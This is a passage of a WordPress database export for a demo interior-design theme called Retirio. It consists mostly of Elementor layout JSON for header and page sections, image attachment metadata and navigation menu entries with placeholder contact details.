"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"4dc739d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":56,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"df0b47c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a751d1\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1740,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1828fb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1fb0666\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":630,\"sizes\":[]},\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0516878\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e58e31c\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"Our highlighted services\\nfor interior design\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"72318fe\",\"elType\":\"widget\",\"settings\":{\"template\":\"template1\",\"post_per_page\":3},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a3dd923\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"b9e79ac\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cab819a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"eb766f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"b196b12\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(1642,4624,'_elementor_page_assets','a:0:{}'),(1643,4631,'_wp_attached_file','2022/11/logo-black.png'),(1644,4631,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:638;s:6:\"height\";i:140;s:4:\"file\";s:22:\"2022/11/logo-black.png\";s:8:\"filesize\";i:9129;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"logo-black-300x66.png\";s:5:\"width\";i:300;s:6:\"height\";i:66;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5950;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"logo-black-150x140.png\";s:5:\"width\";i:150;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:313;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"logo-black-390x140.png\";s:5:\"width\";i:390;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1967;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"logo-black-378x140.png\";s:5:\"width\";i:378;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1684;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"logo-black-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1008;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"logo-black-600x132.png\";s:5:\"width\";i:600;s:6:\"height\";i:132;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13347;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"logo-black-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:420;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1645,10,'_elementor_css','a:6:{s:4:\"time\";i:1668396689;s:5:\"fonts\";a:2:{i:0;s:6:\"Roboto\";i:1;s:11:\"Roboto Slab\";}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(1649,4632,'_wp_attached_file','2022/11/log_file_2022-11-14__03-35-39.txt'),(1666,30,'_menu_item_type','post_type'),(1667,30,'_menu_item_menu_item_parent','0'),(1668,30,'_menu_item_object_id','22'),(1669,30,'_menu_item_object','page'),(1670,30,'_menu_item_target',''),(1671,30,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1672,30,'_menu_item_xfn',''),(1673,30,'_menu_item_url',''),(1674,30,'_wp_old_date','2022-06-07'),(1675,30,'_wp_old_date','2022-06-13'),(1676,30,'_wp_old_date','2022-06-14'),(1677,30,'_wp_old_date','2022-06-15'),(1678,30,'_wp_old_date','2022-06-16'),(1679,30,'_wp_old_date','2022-06-23'),(1680,30,'_wp_old_date','2022-06-24'),(1681,30,'_wp_old_date','2022-06-27'),(1841,773,'_menu_item_type','post_type'),(1842,773,'_menu_item_menu_item_parent','0'),(1843,773,'_menu_item_object_id','40'),(1844,773,'_menu_item_object','page'),(1845,773,'_menu_item_target',''),(1846,773,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1847,773,'_menu_item_xfn',''),(1848,773,'_menu_item_url',''),(1849,773,'_wp_old_date','2022-06-14'),(1850,773,'_wp_old_date','2022-06-15'),(1851,773,'_wp_old_date','2022-06-16'),(1852,773,'_wp_old_date','2022-06-23'),(1853,773,'_wp_old_date','2022-06-24'),(1854,773,'_wp_old_date','2022-06-27'),(1856,774,'_menu_item_type','post_type'),(1857,774,'_menu_item_menu_item_parent','0'),(1858,774,'_menu_item_object_id','38'),(1859,774,'_menu_item_object','page'),(1860,774,'_menu_item_target',''),(1861,774,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1862,774,'_menu_item_xfn',''),(1863,774,'_menu_item_url',''),(1864,774,'_wp_old_date','2022-06-14'),(1865,774,'_wp_old_date','2022-06-15'),(1866,774,'_wp_old_date','2022-06-16'),(1867,774,'_wp_old_date','2022-06-23'),(1868,774,'_wp_old_date','2022-06-24'),(1869,774,'_wp_old_date','2022-06-27'),(1913,4633,'_wp_page_template','default'),(1914,4633,'hf_options','header'),(1915,4633,'_elementor_edit_mode','builder'),(1916,4633,'_elementor_template_type','wp-post'),(1917,4633,'_elementor_version','3.6.6'),(1918,4633,'_elementor_data','[{\"id\":\"dc1de50\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"15\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\",\"z_index\":999,\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#E5E5E530\"},\"elements\":[{\"id\":\"0183fbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":50,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"452409e\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":false},{\"id\":\"bc4c9cc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.332,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"406f25a\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":false},{\"id\":\"f7278e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":45,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"5a9b913\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"size_icon\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"b8901ed\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":false}],\"isInner\":false}]'),(1919,4633,'_elementor_page_assets','a:0:{}'),(1920,4633,'_wxr_import_has_attachment_refs','1'),(1921,4634,'_wp_page_template','default'),(1922,4634,'hf_options','header'),(1923,4634,'_elementor_edit_mode','builder'),(1924,4634,'_elementor_template_type','wp-post'),(1925,4634,'_elementor_version','3.6.6'),(1926,4634,'_elementor_data','[{\"id\":\"7a4dbe5\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"40\",\"bottom\":\"4\",\"left\":\"40\",\"isLinked\":false},\"hide_mobile\":\"hidden-mobile\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"c7453ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"flex-start\"},\"elements\":[{\"id\":\"f6049c6\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"\",\"items_info\":[{\"type\":\"link\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"9c4d876\",\"link_label\":\"30 Commercial Road Fratton, Australia\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/ZVfpkGDfAhHGSeGJ6\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"info_typography_font_weight\":\"400\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"c62eee8\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"label\":\"\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"9c4d876\",\"link_label\":\"30 Commercial Road Fratton, Australia\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/ZVfpkGDfAhHGSeGJ6\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"info_typography_font_weight\":\"400\",\"_element_width\":\"auto\",\"icons_display\":\"flex\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"19f1469\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"flex-end\"},\"elements\":[{\"id\":\"741870a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"type\":\"text\",\"email_label\":\"needhel@company.com\",\"email_address\":\"needhel@company.com\",\"_id\":\"9c4d876\",\"link_label\":\"30 Commercial Road Fratton, Australia\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/ZVfpkGDfAhHGSeGJ6\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"},\"text\":\"Mon - Sat: 8.00 am - 7.00 pm\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"info_typography_font_weight\":\"400\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"ac74640\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"f98c238\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/ovathemes\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"93318f1\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ovatheme.envato\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-pinterest-p\",\"library\":\"fa-brands\"},\"_id\":\"f301bd3\",\"link\":{\"url\":\"https:\\/\\/ovatheme.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"96cddfe\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#02010100\",\"icon_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_secondary_color\":\"#E3B25A\",\"ova_social_icons_display\":\"inline-flex\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"50\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9050f\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"70\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false},\"background_background\":\"classic\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\",\"z_index\":999,\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#E5E5E530\"},\"elements\":[{\"id\":\"d0c5e47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":50,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"3d4c05c\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":false},{\"id\":\"6eaf1d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.332,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"4c538c3\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":false},{\"id\":\"f4f1d3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":45,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"e0ad28b\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"size_icon\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"0b0c6e3\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":false}],\"isInner\":false}]'),(1927,4634,'_elementor_page_assets','a:0:{}'),(1928,4634,'_wxr_import_has_attachment_refs','1'),(1929,4635,'_wp_page_template','default'),(1930,4635,'hf_options','header'),(1931,4635,'_elementor_edit_mode','builder'),(1932,4635,'_elementor_template_type','wp-post'),(1933,4635,'_elementor_version','3.6.6'),(1934,4635,'_elementor_data','[{\"id\":\"0c5f0dc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#1D1D1D\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"8\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"f93bc8a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"align_mobile\":\"center\",\"hide_mobile\":\"hidden-mobile\"},\"elements\":[{\"id\":\"763f753\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Call anytime\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"e4b6ad8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":28,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"bf1b6c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"f00805a\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_logo_s